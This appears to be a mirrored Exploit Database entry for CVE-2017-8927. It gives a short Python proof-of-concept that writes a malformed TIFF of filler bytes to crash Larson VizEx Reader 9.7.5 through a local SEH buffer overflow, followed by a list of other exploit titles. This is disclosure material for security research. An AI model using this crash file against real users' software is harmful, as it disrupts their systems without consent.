Larson VizEx Reader 9.7.5 – Local Buffer Overflow (SEH)

Exploit Database
89 阅读

作者： Muhann4d

日期： 2017-05-14
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/42002/

#!/usr/bin/python
# Exploit Title : Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)
# Date: 14/05/2017
# Exploit Author: Muhann4d
# CVE				: CVE-2017-8927
# Vendor Homepage : http://www.cgmlarson.com/
# Software Link : http://download.freedownloadmanager.org/Windows-PC/Larson-VizEx-Reader/FREE-9.7.5.html
# Affected Versions : 9.7.5 
# Category: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional SP1 32bit
# Proof of Concept: run the exploit, open the poc.tif file with Larson VizEx Reader 9.7.5

# Vendor has been cantacted but no reply

buf = "\x41" * 800
buff = "\x42" * 4
bufff = "\x43" * 4
buffff = "\x44" * 9999
f = open ("poc.tif", "w")
f.write(buf + buff + bufff + buffff)
f.close()

last Exploits
Larson VizEx Reader 9.7.5 – Local Buffer Overflow (SEH)的更多信息

FTP Client (Ubuntu 11.04) – Local Buffer Overflow Crash (PoC)：
Post-it 5.0.1 – Denial of Service (PoC)：
Microsoft Windows Remote Desktop – ‘BlueKeep’ Denial of Service (Metasploit)：
Microsoft DirectWrite / AFDKO – Stack Corruption in OpenType Font Handling due to Out-of-Bounds cubeStackDepth：
Libc – ‘regcomp()’ Stack Exhaustion Denial of Service：
Microsoft Windows Kernel – ‘win32k!NtUserConsoleControl’ Denial of Service (PoC)：
WebKit JSC – ‘ObjectPatternNode::appendEntry’ Stack Use-After-Free：
Adobe Flash – JXR Processing Double-Free：